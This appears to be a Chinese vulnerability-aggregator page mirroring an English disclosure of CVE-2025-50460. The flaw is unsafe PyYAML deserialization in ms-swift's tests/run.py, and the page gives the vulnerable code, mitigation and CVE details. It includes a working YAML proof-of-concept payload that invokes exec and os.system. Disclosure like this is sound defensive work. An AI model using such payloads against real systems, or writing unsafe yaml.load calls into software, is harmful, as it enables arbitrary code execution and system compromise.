关联漏洞
标题:
SWIFT 安全漏洞
(CVE-2025-50460)
描述:SWIFT是ModelScope开源的一个大模型与多模态大模型微调部署框架。 SWIFT 3.3.0版本存在安全漏洞,该漏洞源于PyYAML库中yaml.load()不安全反序列化,可能导致任意代码执行。
描述
Technical Details and Exploit for CVE-2025-50460
介绍
# CVE-2025-50460: Remote Code Execution in modelscope/ms-swift via unsafe PyYAML deserialization
> **Status: RESERVED**
> This CVE ID has been assigned but is not yet published in the official CVE list.
>
> A remote code execution (RCE) vulnerability exists in the ms-swift project version 3.3.0 due to unsafe deserialization in tests/run.py using yaml.load() from the PyYAML library (versions = 5.3.1). If an attacker can control the content of the YAML configuration file passed to the --run_config parameter, arbitrary code can be executed during deserialization. This can lead to full system compromise. The vulnerability is triggered when a malicious YAML file is loaded, allowing the execution of arbitrary Python commands such as os.system(). It is recommended to upgrade PyYAML to version 5.4 or higher, and to use yaml.safe_load() to mitigate the issue.
## Description
A Remote Code Execution (RCE) vulnerability exists in the [modelscope/ms-swift](https://github.com/modelscope/ms-swift) project due to unsafe use of `yaml.load()` in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the `tests/run.py` script, where a user-supplied YAML configuration file is deserialized using `yaml.load()` with `yaml.FullLoader`.
If an attacker can control or replace the YAML configuration file provided to the `--run_config` argument, they may inject a malicious payload that results in arbitrary code execution.
## Affected Repository
- **Project:** [modelscope/ms-swift](https://github.com/modelscope/ms-swift)
- **Affect versions:** latest
- **File:** `tests/run.py`
- **GitHub Permalink:** https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
- **Dependency:** PyYAML <= 5.3.1
## Vulnerable Code
```python
if args.run_config is not None and Path(args.run_config).exists():
with open(args.run_config, encoding='utf-8') as f:
run_config = yaml.load(f, Loader=yaml.FullLoader)
```
## Proof of Concept (PoC)
### Step 1: Create malicious YAML file (`exploit.yaml`)
```yaml
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"
```
### Step 2: Execute with vulnerable PyYAML (<= 5.3.1)
```python
import yaml
with open("exploit.yaml", "r") as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
```
This results in execution of `os.system`, proving code execution.
## Mitigation
* Replace `yaml.load()` with `yaml.safe_load()`
* Upgrade PyYAML to version 5.4 or later
### Example Fix:
```python
# Before
yaml.load(f, Loader=yaml.FullLoader)
# After
yaml.safe_load(f)
```
## CVE Status
| Field | Value |
| ---------------- | ------------------------------------------ |
| CVE ID | CVE-2025-50460 |
| CVSS Score | TBD |
| CWE | CWE-502: Deserialization of Untrusted Data |
| Report Date | 2025-04-25 |
| Disclosure Date | 2025-07-30 |
| Affected Version | latest |
| Fix Version | |
## Author
* Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)
* Contact: *\[[anchor.rongyu020221@gmail.com
](mailto:anchor.rongyu020221@gmail.com
)]*
文件快照
[4.0K] /data/pocs/eaa96bda7c6211cdfa20dd4a33fa6c81d042a9e3
├── [1.0K] LICENSE
└── [3.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。